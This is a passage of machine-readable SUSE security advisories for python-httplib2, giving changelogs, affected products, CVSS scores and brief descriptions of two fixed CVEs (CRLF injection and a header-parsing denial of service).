version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - 
no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle.\n\n- handle the case when validation is disabled correctly.\n The 'check_hostname' context attribute has to be\n set first, othewise a 'ValueError: Cannot set\n verify_mode to CERT_NONE when check_hostname\n is enabled.' exception is raised.\n\n- handle the case with ssl_version being None correctly\n\n- Use ssl.create_default_context in the python2 case so that\n the system wide certificates are loaded as trusted again.\n\n- Source url must be https.\n\n- Spec file cleanups\n\n- Update to 0.10.3\n * Fix certificate validation on Python<=2.7.8 without ssl.CertificateError\n- Update to 0.10.2\n * Just a reupload of 0.10.1, which was broken for Python3\n because wheel distribution doesn't play well with our 2/3 split code base.\n- Update to 0.10.1\n * Remove VeriSign Class 3 CA from trusted certs\n * Add IdenTrust DST Root CA X3\n * Support for specifying the SSL protocol version (Python v2)\n * On App Engine use urlfetch's default deadline if None is passed.\n * Fix TypeError on AppEngine “__init__() got an unexpected keyword argument 'ssl_version’”\n * Send SNI data for SSL connections on Python 2.7.9+\n * Verify the server hostname if certificate validation is enabled\n * Add proxy_headers argument to ProxyInfo constructor\n * Make disable_ssl_certificate_validation work with Python 3.5.\n * Fix socket error handling\n- Remove httplib2-bnc-818100.patch, merged upstream.\n\n- Project moved from code.google.com to GitHub, fix the url\n accordingly\n\n- attempt to build multi-python\n\n- update and cleanup of httplib2-use-system-certs.patch,\n so that the passthrough is clean for python2 and so that 
it does\n the right thing in python3\n ", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1807,SUSE-OpenStack-Cloud-7-2021-1807,SUSE-SLE-Module-Public-Cloud-12-2021-1807", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1807-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1807-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211807-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1807-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008894.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-31T14:23:46Z", generator: { date: "2021-05-31T14:23:46Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1807-1", initial_release_date: "2021-05-31T14:23:46Z", revision_history: [ { date: "2021-05-31T14:23:46Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, 
}, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-7.7.1.noarch", product: { name: "python-httplib2-0.19.0-7.7.1.noarch", product_id: "python-httplib2-0.19.0-7.7.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-7.7.1.noarch", product: { name: "python3-httplib2-0.19.0-7.7.1.noarch", product_id: "python3-httplib2-0.19.0-7.7.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE OpenStack Cloud 7", product: { name: "SUSE OpenStack Cloud 7", product_id: "SUSE OpenStack Cloud 7", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:7", }, }, }, { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 12", product: { name: "SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:12", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.7.1.noarch as component of SUSE OpenStack Cloud 7", product_id: "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.7.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 7", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.7.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 12", product_id: "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.7.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 12", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", 
text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:46Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. 
In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Public Cloud 12:python-httplib2-0.19.0-7.7.1.noarch", "SUSE OpenStack Cloud 7:python-httplib2-0.19.0-7.7.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:46Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1808-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- update to 0.17.3:\n * bugfixes\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- 
version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - 
no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - httplib2 started to use certifi and this is already bent to\n use system certificate bundle\n ", title: "Description of the patch", }, { category: "details", text: "HPE-Helion-OpenStack-8-2021-1808,SUSE-2021-1808,SUSE-OpenStack-Cloud-8-2021-1808,SUSE-OpenStack-Cloud-Crowbar-8-2021-1808", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1808-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1808-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211808-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1808-1", url: "https://lists.suse.com/pipermail/sle-updates/2021-May/019148.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { 
current_release_date: "2021-05-31T14:23:58Z", generator: { date: "2021-05-31T14:23:58Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1808-1", initial_release_date: "2021-05-31T14:23:58Z", revision_history: [ { date: "2021-05-31T14:23:58Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python-httplib2-0.19.0-7.3.1.noarch", product: { name: "python-httplib2-0.19.0-7.3.1.noarch", product_id: "python-httplib2-0.19.0-7.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-7.3.1.noarch", product: { name: "python3-httplib2-0.19.0-7.3.1.noarch", product_id: "python3-httplib2-0.19.0-7.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "HPE Helion OpenStack 8", product: { name: "HPE Helion OpenStack 8", product_id: "HPE Helion OpenStack 8", product_identification_helper: { cpe: "cpe:/o:suse:hpe-helion-openstack:8", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud 8", product: { name: "SUSE OpenStack Cloud 8", product_id: "SUSE OpenStack Cloud 8", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud:8", }, }, }, { category: "product_name", name: "SUSE OpenStack Cloud Crowbar 8", product: { name: "SUSE OpenStack Cloud Crowbar 8", product_id: "SUSE OpenStack Cloud Crowbar 8", product_identification_helper: { cpe: "cpe:/o:suse:suse-openstack-cloud-crowbar:8", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of HPE Helion OpenStack 8", product_id: "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", 
relates_to_product_reference: "HPE Helion OpenStack 8", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of SUSE OpenStack Cloud 8", product_id: "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud 8", }, { category: "default_component_of", full_product_name: { name: "python-httplib2-0.19.0-7.3.1.noarch as component of SUSE OpenStack Cloud Crowbar 8", product_id: "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", }, product_reference: "python-httplib2-0.19.0-7.3.1.noarch", relates_to_product_reference: "SUSE OpenStack Cloud Crowbar 8", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. 
This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:58Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. 
This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "HPE Helion OpenStack 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud 8:python-httplib2-0.19.0-7.3.1.noarch", "SUSE OpenStack Cloud Crowbar 8:python-httplib2-0.19.0-7.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-31T14:23:58Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
suse-su-2021:1637-1
Vulnerability from csaf_suse
Notes
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * 
Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact 
hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2021-1637,SUSE-SLE-Module-Public-Cloud-15-2021-1637", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2021_1637-1.json", }, { category: "self", summary: "URL for SUSE-SU-2021:1637-1", url: "https://www.suse.com/support/update/announcement/2021/suse-su-20211637-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2021:1637-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2021-May/008783.html", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-19T11:34:19Z", generator: { date: 
"2021-05-19T11:34:19Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2021:1637-1", initial_release_date: "2021-05-19T11:34:19Z", revision_history: [ { date: "2021-05-19T11:34:19Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-1.8.1.noarch", product: { name: "python2-httplib2-0.19.0-1.8.1.noarch", product_id: "python2-httplib2-0.19.0-1.8.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-1.8.1.noarch", product: { name: "python3-httplib2-0.19.0-1.8.1.noarch", product_id: "python3-httplib2-0.19.0-1.8.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Public Cloud 15", product: { name: "SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-public-cloud:15", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-1.8.1.noarch as component of SUSE Linux Enterprise Module for Public Cloud 15", product_id: "SUSE Linux Enterprise Module for Public Cloud 15:python3-httplib2-0.19.0-1.8.1.noarch", }, product_reference: "python3-httplib2-0.19.0-1.8.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Public Cloud 15", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and 
